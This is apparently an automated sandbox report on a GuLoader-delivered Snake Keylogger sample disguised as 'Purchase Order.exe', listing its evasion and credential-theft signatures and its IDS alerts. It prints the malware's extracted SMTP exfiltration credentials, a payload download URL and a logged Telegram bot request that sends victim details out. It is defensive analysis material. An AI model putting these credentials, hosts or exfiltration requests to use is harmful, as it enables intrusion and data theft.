Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name:Purchase Order.exe
Analysis ID:1538474
MD5:46ae79c53627f188d4c316adb7635524
SHA1:653fc3ca8b9e79295a59428fe0842ec79060fb75
SHA256:05ca345e803d5783617f8b14194428eb79aa486e0b239ae5656847363729a703
Tags:exeuser-TeamDreier
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Purchase Order.exe (PID: 2876 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 46AE79C53627F188D4C316ADB7635524)
    • Purchase Order.exe (PID: 3340 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 46AE79C53627F188D4C316ADB7635524)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "aridons@falconcables.info", "Password": "7213575aceACE@@", "Host": "hosting1.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3384062771.000000003692F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.2755799259.0000000005F62000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: Purchase Order.exe PID: 3340JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Purchase Order.exe PID: 3340JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T11:30:40.737320+020028033053Unknown Traffic192.168.2.549978188.114.97.3443TCP
            2024-10-21T11:30:42.155353+020028033053Unknown Traffic192.168.2.549980188.114.97.3443TCP
            2024-10-21T11:30:49.059899+020028033053Unknown Traffic192.168.2.549985188.114.97.3443TCP
            2024-10-21T11:30:52.448245+020028033053Unknown Traffic192.168.2.549987188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T11:30:35.926645+020028032742Potentially Bad Traffic192.168.2.549976193.122.130.080TCP
            2024-10-21T11:30:38.155378+020028032742Potentially Bad Traffic192.168.2.549976193.122.130.080TCP
            2024-10-21T11:30:38.379733+020028032742Potentially Bad Traffic192.168.2.549976193.122.130.080TCP
            2024-10-21T11:30:40.036016+020028032742Potentially Bad Traffic192.168.2.549976193.122.130.080TCP
            2024-10-21T11:30:41.457981+020028032742Potentially Bad Traffic192.168.2.549979193.122.130.080TCP
            2024-10-21T11:30:44.895428+020028032742Potentially Bad Traffic192.168.2.549981193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T11:30:30.432233+020028032702Potentially Bad Traffic192.168.2.54997584.38.129.1680TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "aridons@falconcables.info", "Password": "7213575aceACE@@", "Host": "hosting1.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
            Source: Purchase Order.exeVirustotal: Detection: 12%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Purchase Order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49977 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49985 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49988 version: TLS 1.2
            Source: Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004061FB FindFirstFileA,FindClose,0_2_004061FB
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405799
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0040270B FindFirstFileA,4_2_0040270B
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_004061FB FindFirstFileA,FindClose,4_2_004061FB
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405799
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_0011F4D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_0011FB03
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_0011FCE3
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39AB2131h4_2_39AB1E80
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39AB26F8h4_2_39AB22E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABD829h4_2_39ABD580
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABDC81h4_2_39ABD9D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABD3D1h4_2_39ABD128
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABCF79h4_2_39ABCCD0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABC6C9h4_2_39ABC420
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABCB21h4_2_39ABC878
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39AB021Dh4_2_39AB0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39AB0BA7h4_2_39AB0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABFAE9h4_2_39ABF840
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABF239h4_2_39ABEF90
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABF691h4_2_39ABF3E8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABEDE1h4_2_39ABEB38
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABE531h4_2_39ABE288
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABE989h4_2_39ABE6E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39AB26F8h4_2_39AB22D6
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39AB26F8h4_2_39AB2626
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39ABE0D9h4_2_39ABDE30
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA8E28h4_2_39CA8B58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA7A5Dh4_2_39CA7720
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA1CF9h4_2_39CA1A50
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA4471h4_2_39CA41C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA6869h4_2_39CA65C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAF68Eh4_2_39CAF3C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA5E81h4_2_39CA5BD8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAD69Eh4_2_39CAD3D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAB6AEh4_2_39CAB3E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA18A1h4_2_39CA15F8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA5A29h4_2_39CA5780
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAE44Eh4_2_39CAE180
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAC45Eh4_2_39CAC190
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA1449h4_2_39CA11A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA2E59h4_2_39CA2BB0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA0FF1h4_2_39CA0D48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAD20Eh4_2_39CACF40
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA2A01h4_2_39CA2758
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAB21Eh4_2_39CAAF50
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then mov esp, ebp4_2_39CAA968
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA25A9h4_2_39CA2300
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CABFCEh4_2_39CABD00
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA55D1h4_2_39CA5328
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAF1FEh4_2_39CAEF30
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA7571h4_2_39CA72C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAAD8Eh4_2_39CAAAC0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA5179h4_2_39CA4ED0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CADFBEh4_2_39CADCF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA0B99h4_2_39CA08F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA0741h4_2_39CA0498
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA2151h4_2_39CA1EA8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAED6Eh4_2_39CAEAA0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CACD7Eh4_2_39CACAB0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA02E9h4_2_39CA0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAFB1Eh4_2_39CAF850
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CADB2Eh4_2_39CAD860
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA4D21h4_2_39CA4A78
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA7119h4_2_39CA6E70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CABB3Eh4_2_39CAB870
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA32B1h4_2_39CA3008
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA6CC1h4_2_39CA6A18
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAE8DEh4_2_39CAE610
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then mov esp, ebp4_2_39CAA829
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA48C9h4_2_39CA4620
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CAC8EEh4_2_39CAC620
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39CA62DBh4_2_39CA6030
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D15A27h4_2_39D156B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D16050h4_2_39D15D58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1079Eh4_2_39D104D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D181C8h4_2_39D17ED0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D119A6h4_2_39D116D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1ACD0h4_2_39D1A9D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1C4B8h4_2_39D1C1C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D13996h4_2_39D136C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1EFC0h4_2_39D1ECC8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D110BEh4_2_39D10DF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D194E8h4_2_39D191F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D122C6h4_2_39D11FF8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1BFF0h4_2_39D1BCF8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1D7D8h4_2_39D1D4E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D142B7h4_2_39D13FE8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D169E0h4_2_39D166E8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1F488h4_2_39D1F190
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D15066h4_2_39D14D98
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D18690h4_2_39D18398
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D11527h4_2_39D11280
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D19E78h4_2_39D19B80
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D12756h4_2_39D12488
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1C980h4_2_39D1C688
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D16EA8h4_2_39D16BB0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D199B0h4_2_39D196B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1B198h4_2_39D1AEA0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D13076h4_2_39D12DA8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1DCA0h4_2_39D1D9A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1CE48h4_2_39D1CB50
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D13E26h4_2_39D13B58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1F950h4_2_39D1F658
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1030Eh4_2_39D10040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D17838h4_2_39D17540
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1A340h4_2_39D1A048
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1E168h4_2_39D1DE70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D14746h4_2_39D14478
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D17370h4_2_39D17078
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D10C2Eh4_2_39D10960
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D18B58h4_2_39D18860
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D11E36h4_2_39D11B68
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1B660h4_2_39D1B368
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1A808h4_2_39D1A510
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D12BE6h4_2_39D12918
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1D310h4_2_39D1D018
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1EAF8h4_2_39D1E800
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D14BD6h4_2_39D14908
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D17D00h4_2_39D17A08
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1BB28h4_2_39D1B830
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D13506h4_2_39D13238
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1E630h4_2_39D1E338
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D16518h4_2_39D16220
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D1FE19h4_2_39D1FB20
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D154F6h4_2_39D15228
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D19020h4_2_39D18D28
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D41658h4_2_39D41360
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D40CC8h4_2_39D409D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D40800h4_2_39D40508
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D41190h4_2_39D40E98
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 39D40338h4_2_39D40040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_39EA34A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_39EA3490
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_39EA0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_39EA0027
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_39EA0356

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2021/10/2024%20/%2017:55:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49975 -> 84.38.129.16:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49979 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49976 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49981 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49985 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49987 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49980 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49978 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: GET /efxSlCP242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49977 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49985 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
